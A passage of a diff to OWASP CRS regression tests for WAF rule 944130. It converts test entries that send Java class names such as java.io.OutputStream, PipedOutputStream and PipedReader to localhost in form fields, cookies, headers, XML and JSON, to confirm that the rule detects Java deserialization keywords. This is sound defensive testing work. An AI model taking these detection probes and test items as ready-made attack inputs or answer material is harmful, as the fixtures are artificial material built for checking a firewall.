"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.ObjectOutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 188 desc: "Argument test includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-189 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log: + expect_ids: [944130] + - test_id: 189 desc: "Argument name includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.OutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-190 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.OutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 190 desc: "Cookie test includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.OutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-191 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.OutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 191 desc: "Cookie name includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.OutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-192 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.OutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 192 desc: "Request header test includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.OutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-193 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.OutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 193 desc: "XML attribute value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-194 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 194 desc: "XML element value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-195 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log: + expect_ids: [944130] + - test_id: 195 desc: "Nested XML element value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-196 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log: + expect_ids: [944130] + - test_id: 196 desc: "Content-Type text/plain includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-197 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log: + expect_ids: [944130] + - test_id: 197 desc: "Content-Type application/json arg value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.OutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-198 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.OutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 198 desc: "Content-Type application/json arg name includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.OutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-199 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.OutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 199 desc: "Argument test includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-200 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 200 desc: "Argument name includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-201 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 201 desc: "Cookie test includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PipedOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-202 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 202 desc: "Cookie name includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PipedOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-203 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 203 desc: "Request header test includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PipedOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-204 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 204 desc: "XML attribute value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-205 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 205 desc: "XML element value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-206 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 206 desc: "Nested XML element value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-207 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 207 desc: "Content-Type text/plain includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-208 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 208 desc: "Content-Type application/json arg value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PipedOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-209 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedOutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 209 desc: "Content-Type application/json arg name includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PipedOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-210 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PipedOutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 210 desc: "Argument test includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-211 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log: + expect_ids: [944130] + - test_id: 211 desc: "Argument name includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-212 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedReader=test" + output: + log: + expect_ids: [944130] + - test_id: 212 desc: "Cookie test includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PipedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-213 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 213 desc: "Cookie name includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PipedReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-214 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 214 desc: "Request header test includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PipedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-215 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 215 desc: "XML attribute value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id 